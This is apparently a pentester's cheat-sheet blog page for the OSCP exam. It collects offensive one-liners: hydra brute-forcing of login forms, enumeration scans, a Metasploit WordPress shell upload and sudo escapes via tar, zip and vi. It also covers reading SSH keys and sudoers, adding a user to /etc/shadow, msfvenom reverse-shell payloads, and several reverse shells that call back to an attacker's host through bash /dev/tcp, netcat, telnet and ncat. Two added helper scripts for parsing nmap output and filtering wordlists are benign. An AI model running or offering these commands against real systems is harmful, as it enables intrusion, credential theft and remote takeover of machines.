Here are some useful one-liners and links for pentesters. I have collected these commands to be used right away without spending time on remembering the syntax of a particular tool.

These time savers come in handy in a time-limited pentest or during your OSCP exam.

Disclaimer

On this web site you might read about or get access to various kinds of software and technology, including but not limited to libraries, operating systems, software for communications, mobile phones and tablets, Android software and Linux, even cars and motorcycles, security and penetration testing software, software used in security research and forensics, and some samples of software which can be used (elsewhere) for malicious or illegal purposes. You will read about or be provided with ways to change it, operate it and use it. You might find advice and recommendations, which are only an opinion, and not legal advice or a commercial recommendation.
Bear in mind, please, that everything you do, you do solely at your own risk and responsibility. In no way can the author of this web site, information, graphics and other materials presented here or related to it be made liable or otherwise responsible for your own actions or the actions of any third party and their direct or indirect results or consequences, with or without the use of this information or of the software, technology and systems mentioned and/or presented here, no matter whether developed by the author or by any third party.
In no way is it guaranteed that you will find any suitability for any particular purpose, safety, security, legality or even simply functioning of the software and systems described here. You have to make sure each time yourself that what you do is really what you intend to do, and that you are ready to be responsible for it. All the recommendations and experiences described here are the opinions of the corresponding authors and are to be taken with care and at your own full responsibility.
The software provided on or through this web site, linked to from this web site or otherwise related to this web site is provided by the corresponding authors on their own terms. We provide all the software here as is, without any guarantees to you. You are responsible for deciding whether it is suitable for you or not. You are also responsible for all direct or indirect consequences of using this software.
Other web sites linked to from the current one are out of the author's control; we cannot guarantee anything about their content, its quality or even legality. We cannot be liable for any use of the linked web sites or of the information presented there.
We reasonably try to keep this website running smoothly and to deliver information to the best of our knowledge, corresponding to the state of the art at the time the information is composed (usually indicated together with the information), and with good intent. We cannot, however, guarantee and cannot be liable for this website being temporarily or permanently unavailable, presenting unreliable information or software, or any other similar malfunction or functioning not up to your expectations, or any consequences which might result from this site's operation.

Do not run these commands unless you understand exactly what you are doing!

It is illegal to access machines in this way that you are not legally authorized to pentest!

I assume Kali Linux and Bash below. I also assume that the target is on the 192.168.2.0/24 network. Please double-check the address you target before running commands from here!

These commands might be and often are dangerous! You are alone responsible for any direct or indirect consequences of using them! Please, do not use them unless you fully understand the consequences and are ready to deal with them, also legally. If you disagree, please, leave this site immediately.


OSINT

web-hunter

Crawls Google and Bing to find emails, subdomains and links: web-hunter.

Bruteforcing

HTTP form bruteforcing


hydra 192.168.2.1 http-form-post "/login.php:login=^USER^&password=^PASS^&par=val:Wrong password" -l root -P rockyou.txt -t 10 -v
hydra 192.168.2.1 http-form-post "/index/login.asp:password=^PASS^&username=^USER^&submit=Enter:Username" -L users.txt -P /usr/share/wordlists/rockyou.txt -t 5 -vvv

Patator

Power-tool when other tools do not fit the purpose: Patator.

Network enumeration

Ping sweep in shell


for i in $(seq 1 10); do (ping -n -c 1 192.168.2.$i | grep "from" | cut -f4 -d" " | tr -d ":") & done

Ping sweep nmap

nmap -sn 192.168.2.1-10
nmap -sn -oG ping.sweep.res.txt 192.168.2.1-10 # grep-friendly output

Port scan nmap


nmap -p 80 -iL host.list.txt -oG web.servers.list.txt # takes hosts from the list
Scanning all ports (-p-) with nmap quickly (-T5):
nmap -p- -T5 192.168.2.2
Scanning quickly the top 25 ports (those most often in use):
nmap -T5 --top-ports=25 192.168.2.2
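The grepable output (-oG) used above is meant to be post-processed. The following is an added example, not code from the original page: a small POSIX sh/awk function that turns -oG output into a plain "ip port proto service" list of open ports, which is the form you want for feeding other tools or for comparing an authorised scan against an asset inventory. The input is a constructed sample in the -oG format (assumed: one "Host:" line per target, tab-separated fields, port entries as port/state/proto/owner/service/rpc/version/); sample_gnmap, gnmap_open_ports and gnmap_open_host_count are names chosen here.

```shell
#!/bin/sh
# Added example, not from the original page: parse nmap -oG (grepable) output.

# Constructed sample of -oG output (not a real scan).
sample_gnmap() {
    printf '# Nmap 7.80 scan initiated (constructed sample, not a real scan)\n'
    printf 'Host: 192.168.2.1 ()\tStatus: Up\n'
    printf 'Host: 192.168.2.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (997)\n'
    printf 'Host: 192.168.2.5 ()\tPorts: 80/open/tcp//http///, 139/filtered/tcp//netbios-ssn///\n'
    printf '# Nmap done at (constructed sample)\n'
}

# Reads -oG output on stdin; prints one "ip port proto service" line per open port.
gnmap_open_ports() {
    awk -F'\t' '
        /^Host:/ {
            ip = $1
            sub(/^Host: /, "", ip)          # "Host: 192.168.2.1 ()" -> "192.168.2.1 ()"
            sub(/ .*/, "", ip)              # drop the " (hostname)" part
            for (i = 2; i <= NF; i++) {
                if ($i ~ /^Ports: /) {
                    ports = $i
                    sub(/^Ports: /, "", ports)
                    n = split(ports, entry, ", ")
                    for (j = 1; j <= n; j++) {
                        # f[1]=port f[2]=state f[3]=proto f[4]=owner f[5]=service
                        split(entry[j], f, "/")
                        if (f[2] == "open") print ip, f[1], f[3], f[5]
                    }
                }
            }
        }'
}

# Number of distinct hosts with at least one open port, read from stdin.
gnmap_open_host_count() {
    gnmap_open_ports | awk '{ print $1 }' | sort -u | wc -l | tr -d ' '
}

# Usage: sample_gnmap | gnmap_open_ports
```

With a real file the call is simply `gnmap_open_ports < web.servers.list.txt`; closed and filtered ports are dropped, so the list contains only what is actually reachable.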

netdiscover

This program sends ARP requests and identifies hosts quickly. If no range is given, many networks get scanned.

Make sure you use the -i interface switch on a multi-NIC Kali.

netdiscover -i eth1 -r 192.168.2.0/24
Passive scan avoids detection
netdiscover -p  -i eth1 -r 192.168.2.0/24

Arp

Another way to detect hosts passively is to check the ARP table that has already been built:
arp
Arp-scan is an advanced ARP tool with many capabilities. One easy way to scan the local network with it:
arp-scan --interface eth1 --localnet

Tcpdump

sudo tcpdump -i wlan0 -s0 port 110 -w pop3.mail.ru.pcap # -s0 = capture the whole packet
tcpdump -nXAvvv -r pop3.mail.ru.pcap # read the capture

Web Server Enumeration

Dirbuster

dirb http://$tgt

HTTP enum nmap


nmap -vvv --script http-enum.nse --script-args http-enum.basepath='/' 192.168.2.1

Nikto tools


nikto -host 192.168.0.190

Services Enumeration

OS and software version detection with nmap


nmap -iL active.web.servers.txt -sV -O

SMTP Enumeration


Python script: https://molotnikov.de/scripts/smtpenum.txt

SNMP Enumeration


onesixtyone -c communities.txt -i ips.txt # ip addresses
snmpcheck -t 192.168.2.1 # -t target host, see man
# getmib.py prints the MIB OID; see the other communities in the file linked above
snmpwalk -c public -v1 192.168.2.1 $(./getmib.py users)
snmpwalk -c public -v1 192.168.2.1 $(./getmib.py software)

SMB Enumeration

Using smbclient to list (-L) services without a password (-N):
smbclient -N -L //192.168.0.2
Nbtscan, enum4linux, nmap to scan SMB are below:

nbtscan 192.168.2.1-254 # host names and other smb info
enum4linux -a 192.168.2.1 # enumerates users, machines, names, shares, policies
nmap -p139,445 --script smb-enum-users -iL smb.servers.list.txt # get users
nmap -p139,445 --script smb-check-vulns --script-args=unsafe=1 -v -iL smb.servers.list.txt # finding vulnerabilities

On a newer nmap these scripts work instead (no additional args are needed):
    smb-vuln-conficker
    smb-vuln-cve2009-3103
    smb-vuln-ms06-025
    smb-vuln-ms07-029
    smb-vuln-regsvc-dos
    smb-vuln-ms08-067

Shares and OS discovery over SMB


nmap -v --script smb-enum-shares.nse -p445 -iL smb.servers.list.txt # smb shares
nmap -v -p139,445 --script smb-os-discovery.nse -iL smb.servers.list.txt # smb os discovery

DNS Enumeration

DNS Server Version

nmap -sSU -p 53 --script dns-nsid $tgt

Zone Transfers


host -t ns domain.name # gives dns-server
host -t axfr domain.name dns-server # makes zone transfer
dig axfr @dns-server domain.name
dnsrecon -t axfr -d megacorpone.com
# as a script: try a zone transfer from every name server of the domain given as $1
d=$1; for ns in $(host -t NS $d | cut -f4 -d" "); do host -l $d $ns | grep "has addr"; done

Wordpress

wpscan -u 192.168.2.1
wpscan --enumerate users -u http://192.168.2.1/wordpress/

# Upload shell with metasploit:
# run 'msfconsole' first then
  use exploit/unix/webapp/wp_admin_shell_upload
  set rhost 192.168.2.1
  set targeturi wordpress
  set username admin
  set password admin
  run

Yertle tool


git clone https://github.com/n00py/WPForce.git
# alternative link: https://github.com/qutorial/WPForce
cd WPForce
# try the given logins and passwords
python wpforce.py -i usr.txt -w pass.txt -u "http://192.168.2.1/wordpress/"
# then get a shell, it is limited, use metasploit or
# this article better: https://molotnikov.de/wordpress
python yertle.py -u "admin" -p "admin" -t "http://192.168.2.1/wordpress/"

Searching exploits


searchsploit the-app-you-discovered

Docker

Escalating from docker group to root:
https://github.com/chrisfosterelli/dockerrootplease
https://github.com/qutorial/dockerrootplease

Post-exploitation enumeration

Enumerating a Linux machine

http://pentestmonkey.net/tools/unix-privesc-check


unix-privesc-check standard | grep WARNING

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

General enumeration


cat /etc/*-release  #OS version
uname -a

rpm -q kernel

cat ~/.*history #recent commands

find / -perm -o=w -type d 2>/dev/null # world-writable folders
find / -perm -4000 -user root 2> /dev/null # suid binaries

egrep '[0-9a-z]{32,32}' -R . 2>/dev/null # searching regexp, flag

grep "root" * -R | less
grep "pass" * -R | less
tail /etc/passwd # list last users, usually human accounts
su username # try afterwards; sometimes works when sudo is not there

cat /etc/sudoers # getting sudoers
cat /etc/sudoers.d/*

cat ~/.ssh/* # ssh keys
cat /home/*/.ssh/* # ssh keys of others
id # check your groups and their privileges

# add a user "user" with password "123"
echo 'user:$6$7heg3R.G$l2H7Sqi1WCWVy.wzyxcyoMi0fL3/q87ssRIwxNovJjFriuc4hbpagcrAegubexgSJA06vvnL41XdeLILDoKBM0:17415:0:99999:7:::' >> /etc/shadow # single quotes, so the shell does not expand the $-parts of the hash

# lists commands current user may run as root
sudo -l

Check the history and logs of administrative tools, e.g. mongo:


cat ~/.dbshell
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.sh_history
# PowerShell history on Windows:
(Get-PSReadlineOption).HistorySavePath
type C:\Users\username\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Running commands from other commands


# tar
touch foo.bar
sudo tar -cf foo.tar foo.bar --checkpoint-action=exec=/bin/bash --checkpoint=1

# zip
touch foo.bar
sudo zip foo.zip foo.bar --test --unzip-command="sh -c /bin/bash"

# vi
:sh
:!Command

Vulnerability scanning


#Try nmap scripts, maybe even all of them :) 
nmap --script all 127.0.0.1

Defect scanning

Sqlmap

Sqlmap searches for SQLi defects.

Exploiting and Exploits Engineering

Albatar

An advanced SQLi exploitation tool: Albatar.

Patterns


PATH=$PATH:/usr/share/metasploit-framework/tools/exploit/
pattern_offset.rb 12345678 # EIP value
pattern_create.rb 2700 # bytes to generate
nasm_shell.rb # generates opcodes
  	mov eax, esp 	# 89E0
  	inc eax		# 40
  	jmp esp		# FFE4
  	push esp	# 54
  	retn		# C3
  	call esp	# FFD4
  

Generating payloads


#list payloads
msfvenom --list payloads

#metasploit, payload + options, encoder + options
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 10

# add some nops (90) before the shikata ga nai decoder
# format of the exploit: -f [c|python|bash|ruby|...], see msfvenom --help-formats
# executable formats: -f [exe|elf|msi|psh]
# --smallest will generate the smallest possible payload
# --platform windows | linux
# -a x86 | x64  # architecture

# an example for SL Mail
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.32.199 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Immunity debugger and mona script


!mona modules # check NX and ASLR disabled
!mona find -s "\xff\xe4" -m abc.dll

Shells

Spawning a shell - makes your remote shell more usable

python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'

Various shells

http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

Reverse shell with bash and redirects

bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1

Reverse shell Node JS server

https://github.com/evilpacket/ https://github.com/ajinabraham/Node.Js-Security-Course/nodejsshell.py

Generating reverse shell payloads

https://netsec.ws/?p=331
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$attacker_ip LPORT=$attacker_port -f elf > shell

Handling it in metasploit:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost $attacker_ip
set lport $attacker_port
run

Shell with Ncat with SSL and IP Filter

ncat --ssl -nlvp 443 --allow 192.168.1.2 # listen
ncat --ssl 192.168.1.1 443 -c "cmd.exe" # connect

Shell with telnet

nc -lvp 4444 # attacker's machine, for input
nc -lvp 4445 # attacker's machine, for output
telnet [attacker's ip] 4444 | /bin/sh | telnet [attacker's ip] 4445 # on the target system, use the attacker's IP in both places

mknod shell

mknod backpipe p && nc [attacker's ip] 443 0<backpipe | /bin/bash 1>backpipe # on the target
nc -nlvp 443 # on the attacker's machine

Serving Payloads

One line servers


python -m SimpleHTTPServer 8080
python -m pyftpdlib -w -d . -V -p 2121 # write in current folder activated!
python -m CGIHTTPServer # executes scripts in ./cgi-bin/ , sample script
upload.py - simple uploading site, can be served or simply run!
More one-liner servers here: https://gist.github.com/willurd/5720255.

Cross Pasting

cat << EOF > res.txt
> code
> more code
> EOF
# then press Enter

ZSSH - file transfers in ssh shell

# to download a file
root@target: sz file.txt
# to upload Ctrl-Space, then
zssh > sz file.txt

SSH tunneling

ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port: connections to 8080 on your machine go through 192.168.1.7 to 127.0.0.1:80 as seen from there

Open remotely port 80 of 127.0.0.1 (on your machine) as port 8080 on the remote server 192.168.1.7:

ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port

SSH dynamic forwarding

ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

SSH Audit

ssh-audit.py host
https://github.com/arthepsy/ssh-audit

Password cracking

A large list of password recovery tools:
http://securityxploded.com/password-recovery-tools.php
Calling john from metasploit for NTLM cracks:
https://www.offensive-security.com/metasploit-unleashed/john-ripper/

CEWL - building word lists

cewl -d 0 -m 5 -w mylist.txt https://en.wikipedia.org/wiki/Someting
# this makes a list of words of at least 5 characters and saves it; depth 0 means links are not followed
diff --new-line-format="" --unchanged-line-format="" <(sort mylist.txt) <(sort wikipedia.langs.lst) | grep -iv "wiki" | uniq
# removes the words and languages listed in wikipedia.langs.lst
List of languages on Wikipedia: wikipedia.langs.lst
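The diff pipeline above is a set difference: keep the lines of mylist.txt that do not occur in wikipedia.langs.lst. As an added example (not from the original page), the same cleanup written with comm(1), the tool built for exactly this, on two small constructed lists standing in for the cewl output and the language list; make_sample_lists and wordlist_minus are names chosen here.

```shell
#!/bin/sh
# Added example, not from the original page: wordlist set difference with comm(1).

# Constructed stand-ins for mylist.txt (cewl output) and wikipedia.langs.lst.
make_sample_lists() {
    dir=$(mktemp -d)
    printf '%s\n' Deutsch Mitochondria English wikipedia ribosome Polski Wikipedia cytoplasm ribosome > "$dir/mylist.txt"
    printf '%s\n' Deutsch English Polski Suomi > "$dir/wikipedia.langs.lst"
    echo "$dir"
}

# wordlist_minus LIST REMOVE: lines of LIST not present in REMOVE, each once,
# with anything matching "wiki" (case-insensitive) dropped.  comm requires both
# inputs sorted in the same collation, so both are sorted with LC_ALL=C.
wordlist_minus() {
    a=$(mktemp); b=$(mktemp)
    LC_ALL=C sort -u "$1" > "$a"
    LC_ALL=C sort -u "$2" > "$b"
    LC_ALL=C comm -23 "$a" "$b" | grep -iv 'wiki'
    rm -f "$a" "$b"
}

# Usage: d=$(make_sample_lists); wordlist_minus "$d/mylist.txt" "$d/wikipedia.langs.lst"
```

`comm -23` suppresses the columns for "only in the second file" and "in both", leaving only words unique to the first list; sorting with -u also replaces the trailing `uniq` of the original pipeline.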

John - mutate the word list

john -wordlist:words.txt -rules:Wordlist -stdout >> passwords.txt
See the Wordlist rules in /etc/john/john.conf, starting from the [List.Rules:Wordlist] line

CrackStation

This website https://crackstation.net/ will crack some kinds of hashes for you online.

Nice links


 * Much larger arsenal: https://github.com/lanjelot/kb  my fork: https://github.com/qutorial/kb
 * Pentest wiki: https://github.com/nixawk/pentest-wiki my fork: https://github.com/qutorial/pentest-wiki
 * Hacking tutorials: https://github.com/carpedm20/awesome-hacking
 * Linux enumeration by g0tm1lk: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Last update: 26/10/2020